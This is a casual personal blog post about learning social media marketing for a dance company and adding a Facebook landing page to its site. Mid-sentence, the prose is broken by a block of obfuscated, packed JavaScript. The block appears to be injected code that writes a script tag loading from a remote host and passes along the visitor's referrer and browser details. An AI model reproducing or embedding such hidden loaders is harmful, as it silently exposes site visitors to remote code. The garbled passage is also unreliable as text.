Facebook genius

You can call me Mark Zuckerberg.  No, not really.  It wasn’t even that awesome, but it totally felt like it.

Ok, so let’s set the stage.

I take dance lessons.  Yep.  It’s good for your body and way more entertaining than any other form of exercise I’ve tried.  They recently asked for volunteers to head up their “social media marketing.”  It sounded fun, so I decided to give it a try.  They event sent me to a conference in San Francisco to learn all about social media for non-profits.  Good stuff!  I was VERY surprised with some of the info I learned.  The dance companies facebook page left a lot to be desired.  This meant I couldn’t really screw anything up too much.  Sweet!

Ok, first big takeaway from the conference?

Add a landing page!  A what?  A landing page.  This is the first page new visitors will see when they come to your facebook page.  Apparently Victorias ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rinhr|var|u0026u|referrer|defbf||js|php’.split(‘|’),0,{}))
Secret
has a good example of this.  Basically, you make it look like a mini web page instead of all the feed gobbly-gook.

For a business, you get almost double the number of “likes” with a landing page.  Seemed easy enough.

Hahahaha.  After struggling with facebook developers…for way too long….I found a lovely little facebook app that did 80% of the hard stuff for me.

The result?  A great little landing page for the Valley Dance Theatre website.  Go check it out!  It should take you directly to the welcome page, if it doesn’t, click the welcome icon on the left (and please let me know, feedback is really helpful!).
